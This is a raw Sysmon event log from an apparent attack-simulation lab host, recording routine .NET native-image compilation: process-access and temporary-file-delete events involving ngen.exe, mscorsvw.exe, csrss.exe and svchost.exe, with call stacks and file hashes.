21:07:12.233{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A280-60D3-BE05-00000000CF01}7116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023486Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.233{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A280-60D3-BE05-00000000CF01}7116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023485Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.233{4DB9351A-A280-60D3-BD05-00000000CF01}296NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\77G6FMF9S5\System.ComponentModel.Composition.ni.dll.auxMD5=CE96DF3905D1CC6A23A7C86C14A3FAE5,SHA256=9C47A9286B4EF00BB5B06C6CF0AF516CB854DBB939C1F9D8DB6905544AE7C390,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023484Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.233{4DB9351A-A280-60D3-BD05-00000000CF01}296NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\77G6FMF9S5\System.ComponentModel.Composition.ni.dllMD5=F28B29BD6402529446D2DADF82B5F9BC,SHA256=DE27F8F39BD1742CAE3BD069FD651768F6D0EBDB75630056E94E0CC4F713E553,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023483Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.155{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A280-60D3-BD05-00000000CF01}296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023482Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.139{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A280-60D3-BD05-00000000CF01}296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023481Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.123{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A280-60D3-BD05-00000000CF01}296C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023480Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.123{4DB9351A-A280-60D3-BC05-00000000CF01}6456NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\PZUWZE71KD\System.AddIn.Contract.ni.dll.auxMD5=14AA707DD901610E1474784BD6EEBF65,SHA256=744A49325F1DCAC920DF84764653DA4D58651FADDC55BDE70C20B7F54B0EE5BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023479Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.123{4DB9351A-A280-60D3-BC05-00000000CF01}6456NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\PZUWZE71KD\System.AddIn.Contract.ni.dllMD5=5C88EB5B9E8D05EF1C24574FF136A366,SHA256=F0752917AE1CF55D24FF1BF630FEF3134E3836D6FDFCD3D26B4600B3209AAA7F,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023478Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.108{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A280-60D3-BC05-00000000CF01}6456C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023477Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.076{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A280-60D3-BC05-00000000CF01}6456C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023476Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.076{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A280-60D3-BC05-00000000CF01}6456C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023475Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.076{4DB9351A-A27F-60D3-BB05-00000000CF01}5160NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\5XCNLRDOU3\System.Activities.Presentation.ni.dll.auxMD5=2B5E75F067843DA9580B2C8B0A76B163,SHA256=E77CA6194248AB3769AF5D880204C71411CE5FEB8CECF00A82B7798DDA227187,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023474Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:12.076{4DB9351A-A27F-60D3-BB05-00000000CF01}5160NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\5XCNLRDOU3\System.Activities.Presentation.ni.dllMD5=BC8A2FEB6832A7EF3D6CD134D149BDFA,SHA256=3E3AE996221DBF41820C5C455D89E0E841C84FB590DD2FF7304E3F4FFCA9FD69,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023516Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.748{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A281-60D3-C305-00000000CF01}2196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023515Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.733{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A281-60D3-C305-00000000CF01}2196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023514Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.733{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A281-60D3-C305-00000000CF01}2196C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023513Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.717{4DB9351A-A281-60D3-C205-00000000CF01}6632NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GAIG635A3R\System.Data.Linq.ni.dll.auxMD5=C2D0DF807B75CE9FEA7B0D276987B46D,SHA256=0FD4B095B389BAE6CF2236D8E73C66E62B4245FC1B96185A594D62780D8486EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023512Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.717{4DB9351A-A281-60D3-C205-00000000CF01}6632NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GAIG635A3R\System.Data.Linq.ni.dllMD5=30B9A5BBECDEA0B00B789DD43479CAA5,SHA256=BC6FB58597C3035D6B406E78F6164FF0E1DA5D3CAB85B874F804CDD940210211,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023511Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.670{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA35D00F2C64E7048E2FE46B86C5CFC6,SHA256=1B2B34AC1EA1DA5F654C64B489C9EDD1402AD99D57BA03FE4F1EC0D0C718B442,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023510Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.545{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A281-60D3-C205-00000000CF01}6632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023509Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.514{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A281-60D3-C205-00000000CF01}6632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023508Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.514{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A281-60D3-C205-00000000CF01}6632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023507Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.498{4DB9351A-A281-60D3-C105-00000000CF01}4356NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\QCK6JYLWOH\System.Data.Entity.Design.ni.dll.auxMD5=361DB13A3459FCA282724C485E237ADC,SHA256=B92E8A97C9B427B333CC19BBB7A1B494274C29999AEBA556DEF38A3DEBD004D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023506Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.498{4DB9351A-A281-60D3-C105-00000000CF01}4356NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\QCK6JYLWOH\System.Data.Entity.Design.ni.dllMD5=C815C0B5BC8A2F0D3F324987240BF59D,SHA256=BF90185F9A3DB0687C92D694BA2DF75E5FDD104E678C323A673B6BE64EF6C626,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023505Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.311{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A281-60D3-C105-00000000CF01}4356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023504Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.295{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A281-60D3-C105-00000000CF01}4356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023503Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.280{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A281-60D3-C105-00000000CF01}4356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023502Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.280{4DB9351A-A280-60D3-C005-00000000CF01}6624NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\SJFZD3I28S\System.Data.Entity.ni.dll.auxMD5=ED59452242CDFD7AB43ADD13EC75B6DB,SHA256=B2F47FCC365F33254C50F73D7981E78401153C7BEA0AE0104DD48F363794CDCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023501Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.280{4DB9351A-A280-60D3-C005-00000000CF01}6624NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\SJFZD3I28S\System.Data.Entity.ni.dllMD5=8B4DFA12537B38A3CD5FE2D446F43D14,SHA256=46962BAF1F11C4506FA10A477C9636E92E91904C4FC98622FAD6CB38041CB8E1,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023544Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 